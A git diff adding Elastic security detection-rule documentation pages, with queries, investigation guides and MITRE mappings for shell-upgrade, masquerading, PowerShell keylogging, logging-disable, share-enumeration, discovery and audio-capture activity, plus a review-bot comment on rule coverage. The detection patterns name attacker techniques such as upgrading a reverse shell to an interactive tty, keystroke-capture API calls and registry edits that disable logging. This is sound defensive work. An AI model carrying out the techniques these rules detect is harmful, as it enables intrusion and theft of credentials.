@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell]] +=== Potential Upgrade of Non-interactive Shell + +Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and ( + (process.name == "stty" and process.args == "raw" and process.args == "-echo" and process.args_count >= 3) or + (process.name == "script" and process.args in ("-qc", "-c") and process.args == "/dev/null" and + process.args_count == 4) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc new file mode 100644 index 0000000000..772e113d90 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc 
@@ -0,0 +1,131 @@ +[[prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading]] +=== Potential Windows Error Manager Masquerading + +Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/SBousseaden/status/1235533224337641473 +* https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/ +* https://app.any.run/tasks/26051d84-b68e-4afb-8a9a-76921a271b81/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Windows Error Manager Masquerading + +By examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation. + +This rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan = 5s + [process where host.os.type == "windows" and event.type:"start" and process.name : ("wermgr.exe", "WerFault.exe") and process.args_count == 1] + [network where host.os.type == "windows" and process.name : ("wermgr.exe", "WerFault.exe") and network.protocol != "dns" and + network.direction : ("outgoing", "egress") and destination.ip !="::1" and destination.ip !="127.0.0.1" + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc new file mode 100644 index 0000000000..c0ae22def6 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc 
@@ -0,0 +1,138 @@ +[[prebuilt-rule-8-10-5-powershell-keylogging-script]] +=== PowerShell Keylogging Script + +Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-Keystrokes.ps1 +* https://github.com/MojtabaTajik/FunnyKeylogger/blob/master/FunnyLogger.ps1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Keylogging Script + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can abuse PowerShell capabilities to capture user keystrokes with the goal of stealing credentials and other valuable information as credit card data and confidential conversations. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. 
+- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Determine whether the script stores the captured data locally. +- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server. +- Assess network data to determine if the host communicated with the exfiltration server. + +### False positive analysis + +- Regular users do not have a business justification for using scripting utilities to capture keystrokes, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. 
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + ( + powershell.file.script_block_text : (GetAsyncKeyState or NtUserGetAsyncKeyState or GetKeyboardState or "Get-Keystrokes") or + powershell.file.script_block_text : ( + (SetWindowsHookA or SetWindowsHookW or SetWindowsHookEx or SetWindowsHookExA or NtUserSetWindowsHookEx) and + (GetForegroundWindow or GetWindowTextA or GetWindowTextW or "WM_KEYBOARD_LL" or "WH_MOUSE_LL") + ) + ) and not user.id : "S-1-5-18" + and not powershell.file.script_block_text : ( + "sentinelbreakpoints" and "Set-PSBreakpoint" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Input Capture +** ID: T1056 +** Reference URL: https://attack.mitre.org/techniques/T1056/ +* Sub-technique: +** Name: Keylogging +** ID: T1056.001 +** Reference URL: https://attack.mitre.org/techniques/T1056/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc new file mode 100644 index 0000000000..d8c14b35a1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc 
@@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-powershell-script-block-logging-disabled]] +=== PowerShell Script Block Logging Disabled + +Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Script Block Logging Disabled + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code. + +PowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check whether it makes sense for the user to use PowerShell to complete tasks. +- Investigate if PowerShell scripts were run after logging was disabled. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e +- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889 +- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43 +- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d +- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad +- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a +- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.path : ( + "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging" + ) and registry.data.strings : ("0", "0x00000000") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc new file mode 100644 index 0000000000..acf81ec86b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc 
@@ -0,0 +1,141 @@ +[[prebuilt-rule-8-10-5-powershell-share-enumeration-script]] +=== PowerShell Share Enumeration Script + +Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.advintel.io/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations +* https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Collection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Share Enumeration Script + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell to enumerate shares to search for sensitive data like documents, scripts, and other kinds of valuable data for encryption, exfiltration, and lateral movement. 
+ +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Check for additional PowerShell and command line logs that indicate that imported functions were run. + - Evaluate which information was potentially mapped and accessed by the attacker. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text:( + "Invoke-ShareFinder" or + "Invoke-ShareFinderThreaded" or + ( + "shi1_netname" and + "shi1_remark" + ) or + ( + "NetShareEnum" and + "NetApiBufferFree" + ) + ) and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Share Discovery +** ID: T1135 +** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc new file mode 100644 index 0000000000..b2939b5941 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc 
@@ -0,0 +1,177 @@ +[[prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions]] +=== PowerShell Suspicious Discovery Related Windows API Functions + +This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413 +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Collection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Suspicious Discovery Related Windows API Functions + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries like PSReflect or Get-ProcAddress Cmdlet. 
+ +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Check for additional PowerShell and command-line logs that indicate that imported functions were run. + +### False positive analysis + +- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not contain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed. However, analysts should keep in mind that this is not a common way of getting information, making it suspicious. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. 
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + NetShareEnum or + NetWkstaUserEnum or + NetSessionEnum or + NetLocalGroupEnum or + NetLocalGroupGetMembers or + DsGetSiteName or + DsEnumerateDomainTrusts or + WTSEnumerateSessionsEx or + WTSQuerySessionInformation or + LsaGetLogonSessionData or + QueryServiceObjectSecurity or + GetComputerNameEx or + NetWkstaGetInfo or + GetUserNameEx or + NetUserEnum or + NetUserGetInfo or + NetGroupEnum or + NetGroupGetInfo or + NetGroupGetUsers or + NetWkstaTransportEnum or + NetServerGetInfo or + LsaEnumerateTrustedDomains or + NetScheduleJobEnum or + NetUserModalsGet + ) + and not user.id : ("S-1-5-18" or "S-1-5-19") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Permission Groups Discovery +** ID: T1069 +** Reference URL: https://attack.mitre.org/techniques/T1069/ +* Sub-technique: +** Name: Local Groups +** ID: T1069.001 +** Reference URL: https://attack.mitre.org/techniques/T1069/001/ +* Technique: +** Name: Account Discovery +** ID: T1087 +** Reference URL: https://attack.mitre.org/techniques/T1087/ +* Sub-technique: +** Name: Local Account +** ID: T1087.001 +** Reference URL: https://attack.mitre.org/techniques/T1087/001/ +* Technique: +** Name: Domain Trust Discovery +** ID: T1482 +** Reference URL: https://attack.mitre.org/techniques/T1482/ +* Technique: +** Name: Network Share Discovery +** ID: T1135 +** Reference URL: https://attack.mitre.org/techniques/T1135/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* 
Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Network Shared Drive +** ID: T1039 +** Reference URL: https://attack.mitre.org/techniques/T1039/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc new file mode 100644 index 0000000000..40a48b8682 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc 
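Review bot: the query in the preceding hunk (prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc) keys entirely on `powershell.file.script_block_text`, which is only populated when PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) is enabled, yet the page has no Setup section saying so; on hosts without that policy the rule is silent rather than alerting. The second reference (LP_0109_windows_powershell_script_block_log) covers exactly this, so a short Setup paragraph pointing to it would close the gap. Two smaller points in the same hunk: the guide's "Get-ProcAddress Cmdlet" is a PowerSploit/PSReflect helper function, not a built-in cmdlet, and `not user.id : ("S-1-5-18" or "S-1-5-19")` exempts both SYSTEM and LOCAL SERVICE, so a discovery script launched from a SYSTEM scheduled task or service is suppressed; the False positive analysis should state that trade-off explicitly.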
@@ -0,0 +1,133 @@ +[[prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities]] +=== PowerShell Suspicious Script with Audio Capture Capabilities + +Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating PowerShell Suspicious Script with Audio Capture Capabilities + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell to interact with the Windows API with the intent of capturing audio from input devices connected to the victim's computer. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. 
